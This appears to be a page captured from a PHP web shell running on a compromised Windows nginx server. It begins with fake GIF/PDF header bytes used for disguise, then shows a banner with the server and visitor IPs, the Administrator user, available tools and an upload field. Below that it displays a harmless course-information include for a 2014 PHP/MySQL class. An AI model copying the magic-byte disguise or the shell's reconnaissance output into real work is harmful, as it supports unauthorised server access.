GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1146/ |
Upload File : |
<? // JimMartinson/MMDT1146/classInfo.phpinc debugTrackBegin(); #if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; } // Class information. $class = array(); $class['credits'] = 3; $class['lectureHours'] = 48; $class['labHours'] = 0; $class['outsideHours'] = ( $class['credits'] * 16 * 3 ) - $class['lectureHours'] - $class['labHours']; $class['StartDate'][] = '2014-08-25'; $class['StartDate'][] = '2014-08-27'; $class['EndDate'][] = '2014-12-15'; $class['meetingTime'][] = "9:00am-10:15am"; $class['meetingTime'][] = "9:00am-10:15am"; // Textbook information. $textbook = array(); $textbook['ImageSmall'] = '9780321784070sm.jpg'; $textbook['ImageLarge'] = '9780321784070.jpg'; $textbook['Title1'] = "PHP and MySQL for Dynamic Web Sites"; $textbook['Edition1'] = "4th"; $textbook['Author1'] = "Larry Ullman"; $textbook['Publisher1'] = "Peachpit Press"; $textbook['Copyright1'] = "2014"; $textbook['ISBN1'] = 'ISBN-13: 978-0-321-78407-0'; if ($textbook['Edition1'] != '') $textbook['Edition1'] = " <i>".$textbook['Edition1']." Edition</i>"; $textbook['textbook1'] = $textbook['Title1']."<br>"; if ($textbook['Edition1'] !='') $textbook['textbook1'] .= "Edition: ".$textbook['Edition1']."<br>"; $textbook['textbook1'] .= $textbook['Author1']."<br>"; $textbook['textbook1'] .= $textbook['Publisher1']." ".$textbook['Copyright1']."<br>"; $textbook['textbook1'] .= $textbook['ISBN1']; if ( isset($textbook['ImageSmall']) && $textbook['ImageSmall'] != '' ) { $textbook['ImageSmall'] = '<img src="'.$courseDirectory.$textbook['ImageSmall'].'">'; if ( isset($textbook['ImageLarge']) && $textbook['ImageLarge'] != '' ) { $textbook['ImageSmall'] = '<a href="'.$courseDirectory.$textbook['ImageLarge'].'">'.$textbook['ImageSmall'].'</a>'; } #$textbook['textbook1'] = '<table style="vertical-align:bottom;"><tr><td>'.$textbook['ImageSmall'].'</td><td>'.$textbook['textbook1'].'</td></tr></table>'; $textbook['textbook1'] = '<div class="inline"><div style="display:table-cell;">'.$textbook['ImageSmall'].'</div><div style="display:table-cell; padding-left:.5em; vertical-align:top;">'.$textbook['textbook1'].'</div></div>'; } else { $textbook['textbook1'] .= '<br>'; } include('Course/classHours.phpinc'); debugTrackEnd(); ?>